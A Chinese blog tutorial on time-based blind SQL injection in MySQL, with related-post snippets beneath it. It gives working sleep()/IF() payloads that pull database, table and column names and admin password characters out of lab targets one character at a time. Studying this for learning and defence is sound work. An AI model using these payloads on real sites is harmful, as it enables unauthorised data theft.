SQL注入利用学习 - 延时盲注

于 2024-04-09 21:35:14 发布
阅读量684 收藏 2
点赞数 6
分类专栏: WEB漏洞—SQL注入 文章标签: sql 数据库 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_61861243/article/details/137567986
版权

延时盲注原理

无法利用页面显示结果判断SQL注入是否执行成功,此时可以利用 SQL语句执行的延时 判断SQL是 否执行成功。

只要可以执行延时,那么就可以利用该注入技术。

sql时间类型的盲注本质是利用插入的SQL语句执行造成时间延迟,插入的SQL语句中包含延时执行的语 句,当数据库执行该语句时,会延时执行。

Mysql中常用的延时执行函数
sleep(num)
benchmark(num,function) benchmark(100000000,rand())
Mysql中常用的判断结构
IF(condition, when_true, when_false)
例如:
select * from admin where id = 1 and (if(length(database())>0,sleep(3),1));

 延时盲注实验示例讲解:

延时注入也时基于逐个字符猜解的技术。

1、数据库长度

id=1 and if(length(database())=7,sleep(3),null)

根据返回时间确定数据库长度为7。

2、数据库名称

id=1 and if((substr(database(),1,1)='w'),sleep(3),null)

根据延时判断 数据库名称的第一个字符为w. 猜解七次获取数据库名称为 web_sql。

3、数据表名称

id=1 and if((substr((select table_name from information_schema.tables where table_schema=database()
limit 0,1),1,1)='a'),sleep(3),null)

获取第一张数据表的字符为 a ,以此猜解字符获取第一张数据表名称为 admin,第二张数据表为 person。

4、字段名称

id=1 and if((substr((select column_name from information_schema.columns where table_name='admin' limit 0,1),1,1)='i'),sleep(3),null)

获取admin数据表的第一个字段的第一个字符为 i ,以此查出所有字段 id 、username、password。

5、数据内容

id=1 and if((substr((select password from admin limit 0,1),1,1)='f'),sleep(3),null)

获取第一条记录的password字段 字符为f,以此获取字段内容。

SQL注入延时注入
Mr.Huang_的博客
08-28 885
掌控安全靶场地址: http://inject2.lab.aqlab.cn/Pass-13/index.php?id=1 延时注入的原理 适用于,无法回现和无法显示错误页面的场景 利用函数sleep()让服务器休眠,通过休眠时间判断执行的语句对错,从而得到我们想要的信息 我们看到界面,首先在url栏进行GET传参,但是没有任何回显,界面没有变化 ?id=1" and 1=2 --+ 然后使用延时注入 ?id=1" and sleep(10) --+ 1.判断当前数据库的长度 这里我们用到了数据库里的if语
SQL注入-时间
dkxkl1314的博客
03-11 958
就是在SQL注入过程中,SQL语句执行后,查询到的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为。时间忙住特性在页面中,不管用户输入什么,数据交互完成以后目标网站没有错误和正确的页面回显,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。当然也需要构造闭合。如下图不管我们输入什么,页面显示结果都是一样的1、判断是否存在注入2、获取数据库长度3、逐字猜解数据库名4、猜解表名数量5、猜解某个表名长度6、逐字猜解表名。
Mysql注入 -- 延时注入
Web安全工具库
05-16 2979
生活不止眼前的苟且,还有房费、饭费、水电费。。。 ----网易云热评 一、常用函数 1、sleep(5):延时5秒 2、if(a,b,c):a为条件,正确返回b,否则返回c 二、实例测试 1、找到可以注入的payload,服务器反映5秒才有相应 http://192.168.139.129/sqli/Less-9/?id=1' and sleep(5) --+ 2、获取数据库长度,如果数据库名的长度等于8停留5秒 http://192.168.139.129/sqli/..
延迟
Papiofelix's Area
09-03 296
Blind SQL Injection SQL利用方法及总结:http://www.myhack58.com/Article/html/3/7/2011/32223_2.htm 简单介绍Mysql和Mssql的延迟 Mysql benchmark 的使用:http://blog.youkuaiyun.com/veverrr/article/details/6312461 在延迟
延时(一)
qq_45300786的博客
07-13 1249
延时注入的原理 适用于,无法回现和无法显示错误页面的场景 利用函数sleep()让服务器休眠,通过休眠时间判断执行的语句对错,从而得到我们想要的信息 我们看到界面,首先在url栏进行GET传参,但是没有任何回显,界面没有变化 " and 1=2 %23 然后使用延时注入, " and sleep(5) %23 1,判断当前库名的长度 这里我们用到了数据库里的if语句 有点类似于三元运算,条件成立,就执行第二个,条件不成立就执行第三个。 " and if(length(database())=12,
sql注入延时注入
最新发布
weixin_45653478的博客
04-09 2896
攻击者提交一个对执行时间敏感的SQL语句,通过执行时间的长短来判断注入是否成功。id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),5,1))=114,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),1,1))>97,sleep(5),1)--+ #延时5秒。
封神台SQL注入-延时注入
qq_40941912的博客
10-05 453
一、原理 所谓的就是在服务器没有错误回显的时候完成的注入攻击。 服务器没有错误回显,对于攻击者来说缺少了非常重要的“调试信息”。 相关函数 length() => 返回(字符串)长度的数值 substr([],[A],[B]) => 返回[]值中,[A]开始[B]位后的字符值 ascii() => 通过数值返回(此处内容)的阿斯克码 sleep() if(expr1.expr2,expr3) =>判断语句,第一个正确执行2,错误执行3 二、作业 (一) SQL注入-延时 R
10、注入--【时间延时注入
WX公众号-小白学安全
04-05 1711
文章目录原理利用防范靶场 原理 利用 防范 靶场
SQL注入--报错和
qq_57307348的博客
02-10 2049
回顾之前的文章(sql注入基础),了解到sql注入的分类有 基于正常回显 联合查询 union select 基于错误回显 floor() extractvalue()   updatexml() 布尔型 基于时间sleep() 报错注入的前提 页面上没有显示位,但是需要输出SQL语句执行错误信息。比如mysql_error() 优点: 不需要显示位 缺点: 需要输出mysql_error()的...
SQL注入-(布尔与时间
LJH1999ZN的博客
02-10 1万+
一、什么是 就是在sql注入过程中,sql语句执行select之后,可能由于网站代码的限制或者apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为。 通俗的讲就是在前端页面没有显示位,不能返回sql语句执行错误的信息,输入正确和错误返回的信息都是一致的,这时候我们就需要使用页面的正常与不正常显示来进行sql注入。 二、的分类 基于布尔类型的 基于时间类型的 三、利用
SQL注入&&延时
weixin_54882883的博客
05-17 440
布尔注入 猜库位 我们还是通过墨者里面的靶场来进行布尔注入 首先我们一样 要发现他是存在注入点的 and 1=2 那么判断字段呢可以先放下先 我们判断出他存在注入点 那么下面就是猜的库名 怎么猜呢 我们布尔注入是先猜他的库名是几个字母几个特殊字符的 and length(database())=23 假设我们的当时数据库的 库名为 bezr 那么我们的注入语句就是 and length(database())=4 这个语句的意思是 我猜他的库名为四个字母或者说我猜他的库名为四个特殊字符,再或者
MySQL延时注入(3分钟搞懂思路)
yuan_boss的博客
08-23 1943
任务:sqli_labs第9关,通过延时注入,获取版本号。
时间延迟详解
weixin_30729609的博客
09-29 949
0x00 延迟注入定义 延迟注入,是一种的手法,提交对执行时间铭感的函数sql语句,通过执行时间的长短来判断是否执行成功,比如:正确的话会导致时间很长,错误的话会导致执行时间很短,这就是所谓的高级.SQLMAP、穿山甲、胡萝卜等主流注入工具可能检测不出,只能手工检测,利用脚本程序跑出结果。 0x01 延迟注入的函数 sleep() ...
MySQL延时
一个普普通通的博客
03-01 1645
Mysql延时
延时(CVE-2022-0948)
热门推荐
Battery的博客
10-14 12万+
WordPress plugin Order Listener for WooCommerce 3.2.2 之前版本存在SQL注入漏洞。
sql注入——mysql延时注入
Night_time的博客
05-06 6061
注入思路 1,判断是否存在注入点,注入点是字符型还是数值型 2,构建sleep延时注入语句,猜测当前数据库的库名的长度是几个字符 3,猜测数据库下的表名的长度是由多少个字符组成的 4,猜测字段名(列名) 5,猜测数据 使用延时注入的时机 用于,无法回现和无法显示错误页面的场景 使用if(length(注入语句)=N,sleep(5),1),改变N的值,如果条件成立,通过服务器的休...
sql注入-延时注入】sleep()、benchmark()函数 延时注入
07-10 9707
延时注入】结合if、case when 延时注入
mysql延迟注入是什么_mysql 延时注入新思路
weixin_42292183的博客
01-19 377
转自先知社区https://xz.aliyun.com/t/2288在4月的pwnhub比赛中,我们遇到了一个比较神奇的问题,如果在注入中遇到需要延时注入的情况,但服务端过滤了我们一般使用的sleep和benchmark函数,这时候我们有没有办法使用别的方式来替代这两个函数造成延时呢?这里可以代码看看require 'conn.php';$id = $_GET['id'];if(preg_matc...
SQL注入05】延时实例操作
Fighting_hawk的博客
02-19 3683
1. 理解延时与布尔的区别和联系; 2. 掌握延时的方法。
SQL注入工具:高效布尔延时注入脚本
以上内容对SQL注入技术、SQLmap工具、布尔延时注入的具体技术细节以及防范措施进行了详细阐述。同时,对涉及的Python脚本以及压缩包子文件列表中的文件进行了初步解读,给出了可能的学习和应用场景。通过理解...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值